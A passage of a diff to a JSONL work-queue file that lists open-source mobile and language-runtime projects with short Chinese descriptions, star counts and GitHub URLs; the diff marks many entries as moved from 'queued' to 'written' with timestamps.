Swift 数据结构补充包(Deque / OrderedSet / OrderedDictionary)","col4":"4k"},"url":"https://github.com/apple/swift-collections","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"swift-nio","area":"projects","topic":"mobile","title":"swift-nio","meta":{"col3":"Apple 的 Swift 异步事件驱动网络框架(对标 Netty)","col4":"8k"},"url":"https://github.com/apple/swift-nio","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"vapor","area":"projects","topic":"mobile","title":"vapor","meta":{"col3":"Swift 的 Web 后端框架(基于 SwiftNIO,Express / Fastify 风格)","col4":"25k"},"url":"https://github.com/vapor/vapor","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"swiftui-introspect","area":"projects","topic":"mobile","title":"swiftui-introspect","meta":{"col3":"让 SwiftUI 视图能访问底层 UIKit / AppKit 对象(绕开 SwiftUI 黑盒)","col4":"5k"},"url":"https://github.com/siteline/SwiftUI-Introspect","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"retrofit","area":"projects","topic":"mobile","title":"retrofit","meta":{"col3":"Square 出品 Android HTTP 客户端,注解 + 接口 → 自动生成 OkHttp 调用","col4":"43k"},"url":"https://github.com/square/retrofit","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"okhttp","area":"projects","topic":"mobile","title":"okhttp","meta":{"col3":"Square 出品 HTTP 客户端,Android 网络层事实标准(连接池 / HTTP/2)","col4":"46k"},"url":"https://github.com/square/okhttp","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"coil","area":"projects","topic":"mobile","title":"coil","meta":{"col3":"Compose 优先的 Kotlin 图片加载库(kotlinx coroutines + OkHttp)","col4":"11k"},"url":"https://github.com/coil-kt/coil","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"glide","area":"projects","topic":"mobile","title":"glide","meta":{"col3":"Bumptech 的 Android 图片加载库(老牌主流,缓存 + 内存优化)","col4":"35k"},"url":"https://github.com/bumptech/glide","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"accompanist","area":"projects","topic":"mobile","title":"accompanist","meta":{"col3":"Google 出品 Compose 工具集(permissions / pager / system-ui 等)","col4":"8k"},"url":"https://github.com/google/accompanist","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"jetpack-compose-samples","area":"projects","topic":"mobile","title":"jetpack-compose-samples","meta":{"col3":"Google 官方 Compose 样例集合(Crane / Jetnews / Jetchat 三大教学样本)","col4":"21k"},"url":"https://github.com/android/compose-samples","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"fastlane","area":"projects","topic":"mobile","title":"fastlane","meta":{"col3":"iOS / Android 自动化发布事实标准(截图 / 签名 / TestFlight / Play 提交)","col4":"40k"},"url":"https://github.com/fastlane/fastlane","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"metro","area":"projects","topic":"mobile","title":"metro","meta":{"col3":"RN 官方 JS bundler(替代 webpack 优化 RN 增量构建 / HMR)","col4":"5k"},"url":"https://github.com/facebook/metro","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"react-native-builder-bob","area":"projects","topic":"mobile","title":"react-native-builder-bob","meta":{"col3":"RN 库构建工具(Callstack 出品,npm 包含 commonjs/esm/d.ts 多产物)","col4":"2k"},"url":"https://github.com/callstack/react-native-builder-bob","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"flipper","area":"projects","topic":"mobile","title":"flipper","meta":{"col3":"Meta 出品移动调试器(Network / Layout / Logs / Plugin 架构)","col4":"13k"},"url":"https://github.com/facebook/flipper","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"detox","area":"projects","topic":"mobile","title":"detox","meta":{"col3":"Wix 出品 RN E2E 测试框架(灰盒,能感知 RN 内部状态)","col4":"11k"},"url":"https://github.com/wix/Detox","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"appium","area":"projects","topic":"mobile","title":"appium","meta":{"col3":"跨平台移动 UI 自动化(iOS / Android / Web,WebDriver 协议)","col4":"19k"},"url":"https://github.com/appium/appium","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"maestro","area":"projects","topic":"mobile","title":"maestro","meta":{"col3":"Mobile.dev 出品声明式移动 E2E(YAML 写流程,自然语言级简单)","col4":"17k"},"url":"https://github.com/mobile-dev-inc/maestro","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"webdriverio","area":"projects","topic":"mobile","title":"webdriverio","meta":{"col3":"Node.js WebDriver 实现,桌面浏览器 + 移动 / 桌面 app 全覆盖","col4":"9k"},"url":"https://github.com/webdriverio/webdriverio","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} -{"slug":"workbox","area":"projects","topic":"mobile","title":"workbox","meta":{"col3":"Google 出品 PWA Service Worker 工具集(缓存策略 / 后台同步 / 推送)","col4":"12k"},"url":"https://github.com/GoogleChrome/workbox","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"remax","area":"projects","topic":"mobile","title":"remax","meta":{"col3":"阿里出品 React → 小程序(不写自家 DSL,直接复用 React 运行时)","col4":"6k"},"url":"https://github.com/remaxjs/remax","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:26:15.167Z"} +{"slug":"swift-collections","area":"projects","topic":"mobile","title":"swift-collections","meta":{"col3":"Apple 官方 Swift 数据结构补充包(Deque / OrderedSet / OrderedDictionary)","col4":"4k"},"url":"https://github.com/apple/swift-collections","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:28:28.459Z"} +{"slug":"swift-nio","area":"projects","topic":"mobile","title":"swift-nio","meta":{"col3":"Apple 的 Swift 异步事件驱动网络框架(对标 Netty)","col4":"8k"},"url":"https://github.com/apple/swift-nio","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:36:38.343Z"} +{"slug":"vapor","area":"projects","topic":"mobile","title":"vapor","meta":{"col3":"Swift 的 Web 后端框架(基于 SwiftNIO,Express / Fastify 风格)","col4":"25k"},"url":"https://github.com/vapor/vapor","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:41:41.878Z"} +{"slug":"swiftui-introspect","area":"projects","topic":"mobile","title":"swiftui-introspect","meta":{"col3":"让 SwiftUI 视图能访问底层 UIKit / AppKit 对象(绕开 SwiftUI 黑盒)","col4":"5k"},"url":"https://github.com/siteline/SwiftUI-Introspect","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:46:20.722Z"} +{"slug":"retrofit","area":"projects","topic":"mobile","title":"retrofit","meta":{"col3":"Square 出品 Android HTTP 客户端,注解 + 接口 → 自动生成 OkHttp 调用","col4":"43k"},"url":"https://github.com/square/retrofit","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:51:23.903Z"} +{"slug":"okhttp","area":"projects","topic":"mobile","title":"okhttp","meta":{"col3":"Square 出品 HTTP 客户端,Android 网络层事实标准(连接池 / HTTP/2)","col4":"46k"},"url":"https://github.com/square/okhttp","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T06:56:25.398Z"} +{"slug":"coil","area":"projects","topic":"mobile","title":"coil","meta":{"col3":"Compose 优先的 Kotlin 图片加载库(kotlinx coroutines + OkHttp)","col4":"11k"},"url":"https://github.com/coil-kt/coil","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:01:28.603Z"} +{"slug":"glide","area":"projects","topic":"mobile","title":"glide","meta":{"col3":"Bumptech 的 Android 图片加载库(老牌主流,缓存 + 内存优化)","col4":"35k"},"url":"https://github.com/bumptech/glide","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:11:35.044Z"} +{"slug":"accompanist","area":"projects","topic":"mobile","title":"accompanist","meta":{"col3":"Google 出品 Compose 工具集(permissions / pager / system-ui 等)","col4":"8k"},"url":"https://github.com/google/accompanist","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:16:38.242Z"} +{"slug":"jetpack-compose-samples","area":"projects","topic":"mobile","title":"jetpack-compose-samples","meta":{"col3":"Google 官方 Compose 样例集合(Crane / Jetnews / Jetchat 三大教学样本)","col4":"21k"},"url":"https://github.com/android/compose-samples","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:21:41.494Z"} +{"slug":"fastlane","area":"projects","topic":"mobile","title":"fastlane","meta":{"col3":"iOS / Android 自动化发布事实标准(截图 / 签名 / TestFlight / Play 提交)","col4":"40k"},"url":"https://github.com/fastlane/fastlane","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:26:45.070Z"} +{"slug":"metro","area":"projects","topic":"mobile","title":"metro","meta":{"col3":"RN 官方 JS bundler(替代 webpack 优化 RN 增量构建 / HMR)","col4":"5k"},"url":"https://github.com/facebook/metro","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:31:48.301Z"} +{"slug":"react-native-builder-bob","area":"projects","topic":"mobile","title":"react-native-builder-bob","meta":{"col3":"RN 库构建工具(Callstack 出品,npm 包含 commonjs/esm/d.ts 多产物)","col4":"2k"},"url":"https://github.com/callstack/react-native-builder-bob","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:41:54.791Z"} +{"slug":"flipper","area":"projects","topic":"mobile","title":"flipper","meta":{"col3":"Meta 出品移动调试器(Network / Layout / Logs / Plugin 架构)","col4":"13k"},"url":"https://github.com/facebook/flipper","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:46:57.971Z"} +{"slug":"detox","area":"projects","topic":"mobile","title":"detox","meta":{"col3":"Wix 出品 RN E2E 测试框架(灰盒,能感知 RN 内部状态)","col4":"11k"},"url":"https://github.com/wix/Detox","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:52:01.167Z"} +{"slug":"appium","area":"projects","topic":"mobile","title":"appium","meta":{"col3":"跨平台移动 UI 自动化(iOS / Android / Web,WebDriver 协议)","col4":"19k"},"url":"https://github.com/appium/appium","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T07:57:04.348Z"} +{"slug":"maestro","area":"projects","topic":"mobile","title":"maestro","meta":{"col3":"Mobile.dev 出品声明式移动 E2E(YAML 写流程,自然语言级简单)","col4":"17k"},"url":"https://github.com/mobile-dev-inc/maestro","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T08:02:07.466Z"} +{"slug":"webdriverio","area":"projects","topic":"mobile","title":"webdriverio","meta":{"col3":"Node.js WebDriver 实现,桌面浏览器 + 移动 / 桌面 app 全覆盖","col4":"9k"},"url":"https://github.com/webdriverio/webdriverio","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} +{"slug":"workbox","area":"projects","topic":"mobile","title":"workbox","meta":{"col3":"Google 出品 PWA Service Worker 工具集(缓存策略 / 后台同步 / 推送)","col4":"12k"},"url":"https://github.com/GoogleChrome/workbox","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md","written_at":"2026-06-13T08:07:10.701Z"} {"slug":"pwa-builder","area":"projects","topic":"mobile","title":"pwa-builder","meta":{"col3":"Microsoft 出品 PWA 一键打包成 iOS / Android / Windows app 的工具","col4":"3k"},"url":"https://github.com/pwa-builder/PWABuilder","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-mobile.md"} {"slug":"node-js","area":"projects","topic":"runtimes","title":"Node.js — 服务端 JS 运行时之父","meta":{"col3":"~107k","col4":"V8 + libuv 的事件循环范式定义了整个生态"},"url":"https://github.com/nodejs/node","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"deno","area":"projects","topic":"runtimes","title":"Deno — 安全优先的 JS/TS 运行时","meta":{"col3":"~98k","col4":"TypeScript 原生 / 默认沙箱权限 / Web 标准 API,Ryan Dahl 的 Node 反思"},"url":"https://github.com/denoland/deno","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"bun","area":"projects","topic":"runtimes","title":"Bun — JavaScriptCore 驱动的全能运行时(已在 atlas,多类目)","meta":{"col3":"~74k","col4":"Zig 写、JSC 引擎、自带 bundler / 包管理 / 测试,启动极快"},"url":"https://github.com/oven-sh/bun","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"quickjs","area":"projects","topic":"runtimes","title":"QuickJS — Fabrice Bellard 的小型 JS 引擎","meta":{"col3":"~10k","col4":"单文件 C 实现,ES2023 完整支持,嵌入与教学首选"},"url":"https://github.com/bellard/quickjs","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"hermes","area":"projects","topic":"runtimes","title":"Hermes — Facebook 的 React Native JS 引擎","meta":{"col3":"~10k","col4":"AOT 字节码 + 启动时间优化,移动端 JS 性能教科书"},"url":"https://github.com/facebook/hermes","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"engine262","area":"projects","topic":"runtimes","title":"engine262 — 用 JS 写的 ECMAScript 规范实现","meta":{"col3":"~2.4k","col4":"直接对照规范条款的解释器,理解 JS 语义不二之选"},"url":"https://github.com/engine262/engine262","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"boa-engine","area":"projects","topic":"runtimes","title":"Boa — Rust 写的 ES 解释器","meta":{"col3":"~7.7k","col4":"嵌入 Rust 程序的轻量 JS 引擎,规范学习 + 工程实现兼顾"},"url":"https://github.com/boa-dev/boa","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"llrt","area":"projects","topic":"runtimes","title":"LLRT — AWS Lambda 低延迟 JS 运行时","meta":{"col3":"~9k","col4":"QuickJS + Rust,针对 Lambda 冷启动优化(无 JIT)"},"url":"https://github.com/awslabs/llrt","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"v8","area":"projects","topic":"runtimes","title":"V8 — Chrome / Node 底层引擎","meta":{"col3":"~24k","col4":"行业最高水平 JS JIT(TurboFan / Sparkplug / Maglev / Ignition)"},"url":"https://github.com/v8/v8","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} +{"slug":"hermes","area":"projects","topic":"runtimes","title":"Hermes — Facebook 的 React Native JS 引擎","meta":{"col3":"~10k","col4":"AOT 字节码 + 启动时间优化,移动端 JS 性能教科书"},"url":"https://github.com/facebook/hermes","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T06:36:38.464Z"} +{"slug":"engine262","area":"projects","topic":"runtimes","title":"engine262 — 用 JS 写的 ECMAScript 规范实现","meta":{"col3":"~2.4k","col4":"直接对照规范条款的解释器,理解 JS 语义不二之选"},"url":"https://github.com/engine262/engine262","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T06:41:41.999Z"} +{"slug":"boa-engine","area":"projects","topic":"runtimes","title":"Boa — Rust 写的 ES 解释器","meta":{"col3":"~7.7k","col4":"嵌入 Rust 程序的轻量 JS 引擎,规范学习 + 工程实现兼顾"},"url":"https://github.com/boa-dev/boa","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} +{"slug":"llrt","area":"projects","topic":"runtimes","title":"LLRT — AWS Lambda 低延迟 JS 运行时","meta":{"col3":"~9k","col4":"QuickJS + Rust,针对 Lambda 冷启动优化(无 JIT)"},"url":"https://github.com/awslabs/llrt","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T06:46:20.848Z"} +{"slug":"v8","area":"projects","topic":"runtimes","title":"V8 — Chrome / Node 底层引擎","meta":{"col3":"~24k","col4":"行业最高水平 JS JIT(TurboFan / Sparkplug / Maglev / Ignition)"},"url":"https://github.com/v8/v8","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T06:56:25.525Z"} {"slug":"wasmtime","area":"projects","topic":"runtimes","title":"Wasmtime — Bytecode Alliance 标准 wasm runtime","meta":{"col3":"~16k","col4":"Cranelift JIT + WASI,Rust 写的工业级 wasm 解释/编译器"},"url":"https://github.com/bytecodealliance/wasmtime","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"wasmer","area":"projects","topic":"runtimes","title":"Wasmer — 跨平台 wasm 运行时","meta":{"col3":"~19k","col4":"LLVM / Cranelift / Singlepass 三后端,可嵌入十几种语言"},"url":"https://github.com/wasmerio/wasmer","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"wamr","area":"projects","topic":"runtimes","title":"WAMR — wasm 微运行时(嵌入式)","meta":{"col3":"~5.5k","col4":"C 写、IoT 友好,AOT/JIT/解释三种模式可选"},"url":"https://github.com/bytecodealliance/wasm-micro-runtime","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"wasmedge","area":"projects","topic":"runtimes","title":"WasmEdge — 云原生 wasm 运行时","meta":{"col3":"~9k","col4":"CNCF 沙盒项目,扩展了网络 / TensorFlow / 数据库等宿主接口"},"url":"https://github.com/WasmEdge/WasmEdge","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"wazero","area":"projects","topic":"runtimes","title":"wazero — 纯 Go 实现的 wasm runtime","meta":{"col3":"~5k","col4":"零 cgo / 零外部依赖,可作 Go 程序内嵌沙箱"},"url":"https://github.com/tetratelabs/wazero","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"openjdk","area":"projects","topic":"runtimes","title":"OpenJDK — Java 标准实现","meta":{"col3":"~21k","col4":"HotSpot VM + JIT + GC(G1 / ZGC / Shenandoah),整个企业 Java 的根"},"url":"https://github.com/openjdk/jdk","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"graalvm","area":"projects","topic":"runtimes","title":"GraalVM — 多语言通用 VM","meta":{"col3":"~21k","col4":"Truffle 框架 + Substrate 原生镜像,把 JS / Python / Ruby 拉进 JVM 生态"},"url":"https://github.com/oracle/graal","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"kotlin","area":"projects","topic":"runtimes","title":"Kotlin — JetBrains 的 JVM 语言","meta":{"col3":"~50k","col4":"编译到 JVM / JS / Native 三目标,coroutine 是教科书级实现"},"url":"https://github.com/JetBrains/kotlin","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"scala","area":"projects","topic":"runtimes","title":"Scala — 函数式 + OO 的 JVM 语言","meta":{"col3":"~14k","col4":"类型系统(HKT / 隐式参数)影响了一代静态语言设计"},"url":"https://github.com/scala/scala","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"clojure","area":"projects","topic":"runtimes","title":"Clojure — JVM 上的 Lisp","meta":{"col3":"~10k","col4":"持久数据结构 + STM,函数式范式工程化的范例"},"url":"https://github.com/clojure/clojure","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"eclipse-openj9","area":"projects","topic":"runtimes","title":"Eclipse OpenJ9 — IBM JVM","meta":{"col3":"~3.4k","col4":"云端 / 容器友好 JVM,启动时间和内存占用优于 HotSpot"},"url":"https://github.com/eclipse-openj9/openj9","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"cpython","area":"projects","topic":"runtimes","title":"CPython — Python 官方实现","meta":{"col3":"~63k","col4":"引用计数 + GIL + 字节码解释器,3.11+ 起的 specialization JIT 基础"},"url":"https://github.com/python/cpython","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"pypy","area":"projects","topic":"runtimes","title":"PyPy — RPython 写的 Python JIT","meta":{"col3":"~1.7k","col4":"meta-tracing JIT 范例(RPython 工具链),在数值代码上常 5-10x"},"url":"https://github.com/pypy/pypy","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"rustpython","area":"projects","topic":"runtimes","title":"RustPython — Rust 写的 Python 解释器","meta":{"col3":"~20k","col4":"可编译到 wasm,浏览器内跑 Python 的现实路径"},"url":"https://github.com/RustPython/RustPython","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"cinder","area":"projects","topic":"runtimes","title":"Cinder — Instagram 内部 CPython 分支","meta":{"col3":"~3.5k","col4":"Static Python + Strict Modules + JIT,是 3.13+ 部分特性的孵化器"},"url":"https://github.com/facebookincubator/cinder","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} +{"slug":"wasmer","area":"projects","topic":"runtimes","title":"Wasmer — 跨平台 wasm 运行时","meta":{"col3":"~19k","col4":"LLVM / Cranelift / Singlepass 三后端,可嵌入十几种语言"},"url":"https://github.com/wasmerio/wasmer","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:01:28.722Z"} +{"slug":"wamr","area":"projects","topic":"runtimes","title":"WAMR — wasm 微运行时(嵌入式)","meta":{"col3":"~5.5k","col4":"C 写、IoT 友好,AOT/JIT/解释三种模式可选"},"url":"https://github.com/bytecodealliance/wasm-micro-runtime","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:06:31.980Z"} +{"slug":"wasmedge","area":"projects","topic":"runtimes","title":"WasmEdge — 云原生 wasm 运行时","meta":{"col3":"~9k","col4":"CNCF 沙盒项目,扩展了网络 / TensorFlow / 数据库等宿主接口"},"url":"https://github.com/WasmEdge/WasmEdge","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:11:35.165Z"} +{"slug":"wazero","area":"projects","topic":"runtimes","title":"wazero — 纯 Go 实现的 wasm runtime","meta":{"col3":"~5k","col4":"零 cgo / 零外部依赖,可作 Go 程序内嵌沙箱"},"url":"https://github.com/tetratelabs/wazero","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:16:38.363Z"} +{"slug":"openjdk","area":"projects","topic":"runtimes","title":"OpenJDK — Java 标准实现","meta":{"col3":"~21k","col4":"HotSpot VM + JIT + GC(G1 / ZGC / Shenandoah),整个企业 Java 的根"},"url":"https://github.com/openjdk/jdk","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:21:41.627Z"} +{"slug":"graalvm","area":"projects","topic":"runtimes","title":"GraalVM — 多语言通用 VM","meta":{"col3":"~21k","col4":"Truffle 框架 + Substrate 原生镜像,把 JS / Python / Ruby 拉进 JVM 生态"},"url":"https://github.com/oracle/graal","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:26:45.201Z"} +{"slug":"kotlin","area":"projects","topic":"runtimes","title":"Kotlin — JetBrains 的 JVM 语言","meta":{"col3":"~50k","col4":"编译到 JVM / JS / Native 三目标,coroutine 是教科书级实现"},"url":"https://github.com/JetBrains/kotlin","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:31:48.434Z"} +{"slug":"scala","area":"projects","topic":"runtimes","title":"Scala — 函数式 + OO 的 JVM 语言","meta":{"col3":"~14k","col4":"类型系统(HKT / 隐式参数)影响了一代静态语言设计"},"url":"https://github.com/scala/scala","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:36:51.675Z"} +{"slug":"clojure","area":"projects","topic":"runtimes","title":"Clojure — JVM 上的 Lisp","meta":{"col3":"~10k","col4":"持久数据结构 + STM,函数式范式工程化的范例"},"url":"https://github.com/clojure/clojure","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:41:54.913Z"} +{"slug":"eclipse-openj9","area":"projects","topic":"runtimes","title":"Eclipse OpenJ9 — IBM JVM","meta":{"col3":"~3.4k","col4":"云端 / 容器友好 JVM,启动时间和内存占用优于 HotSpot"},"url":"https://github.com/eclipse-openj9/openj9","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:46:58.092Z"} +{"slug":"cpython","area":"projects","topic":"runtimes","title":"CPython — Python 官方实现","meta":{"col3":"~63k","col4":"引用计数 + GIL + 字节码解释器,3.11+ 起的 specialization JIT 基础"},"url":"https://github.com/python/cpython","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:52:01.291Z"} +{"slug":"pypy","area":"projects","topic":"runtimes","title":"PyPy — RPython 写的 Python JIT","meta":{"col3":"~1.7k","col4":"meta-tracing JIT 范例(RPython 工具链),在数值代码上常 5-10x"},"url":"https://github.com/pypy/pypy","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T07:57:04.474Z"} +{"slug":"rustpython","area":"projects","topic":"runtimes","title":"RustPython — Rust 写的 Python 解释器","meta":{"col3":"~20k","col4":"可编译到 wasm,浏览器内跑 Python 的现实路径"},"url":"https://github.com/RustPython/RustPython","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T08:02:07.592Z"} +{"slug":"cinder","area":"projects","topic":"runtimes","title":"Cinder — Instagram 内部 CPython 分支","meta":{"col3":"~3.5k","col4":"Static Python + Strict Modules + JIT,是 3.13+ 部分特性的孵化器"},"url":"https://github.com/facebookincubator/cinder","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md","written_at":"2026-06-13T08:07:10.830Z"} {"slug":"nuitka","area":"projects","topic":"runtimes","title":"Nuitka — Python 到 C 编译器","meta":{"col3":"~13k","col4":"把 Python 源码编译成 C,链接 CPython API 生成单二进制"},"url":"https://github.com/Nuitka/Nuitka","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"pyston","area":"projects","topic":"runtimes","title":"Pyston — Dropbox 起家的 Python JIT","meta":{"col3":"~2.5k","col4":"修改后的 CPython + JIT,在 Web 工作负载上 30% 加速"},"url":"https://github.com/pyston/pyston","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} +{"slug":"pyston","area":"projects","topic":"runtimes","title":"Pyston — Dropbox 起家的 Python JIT","meta":{"col3":"~2.5k","col4":"修改后的 CPython + JIT,在 Web 工作负载上 30% 加速"},"url":"https://github.com/pyston/pyston","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"mruby","area":"projects","topic":"runtimes","title":"mruby — 嵌入式 Ruby","meta":{"col3":"~5.5k","col4":"matz 设计的轻量 Ruby,单芯片 / 游戏脚本场景首选"},"url":"https://github.com/mruby/mruby","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"jruby","area":"projects","topic":"runtimes","title":"JRuby — JVM 上的 Ruby","meta":{"col3":"~3.9k","col4":"复用 JVM JIT / 线程,能调 Java 库"},"url":"https://github.com/jruby/jruby","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"truffleruby","area":"projects","topic":"runtimes","title":"TruffleRuby — GraalVM 上的 Ruby","meta":{"col3":"~3k","col4":"Truffle 框架的标志性实现,热点代码可达 native 性能"},"url":"https://github.com/oracle/truffleruby","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} @@ -1502,7 +1503,7 @@ {"slug":"clozure-cl","area":"projects","topic":"runtimes","title":"Clozure CL — 苹果系 Common Lisp","meta":{"col3":"~870","col4":"macOS / iOS 友好的 ANSI CL,原生编译器 + 多线程 GC"},"url":"https://github.com/Clozure/ccl","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"opensmalltalk-vm","area":"projects","topic":"runtimes","title":"OpenSmalltalk VM (Cog) — Cog VM 的现代继承","meta":{"col3":"~1.2k","col4":"Smalltalk-80 的活态 VM,inline cache / Polymorphic IC 鼻祖"},"url":"https://github.com/OpenSmalltalk/opensmalltalk-vm","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"pharo","area":"projects","topic":"runtimes","title":"Pharo — 现代 Smalltalk 环境","meta":{"col3":"~1.4k","col4":"镜像式开发 + live coding 哲学,研究纯 OO 系统的入口"},"url":"https://github.com/pharo-project/pharo","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"erlang-otp","area":"projects","topic":"runtimes","title":"Erlang/OTP — BEAM 虚拟机与 actor 标准库","meta":{"col3":"~12k","col4":"抢占式调度 + 隔离堆 + supervisor,电信级容错语言根基"},"url":"https://github.com/erlang/otp","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} +{"slug":"erlang-otp","area":"projects","topic":"runtimes","title":"Erlang/OTP — BEAM 虚拟机与 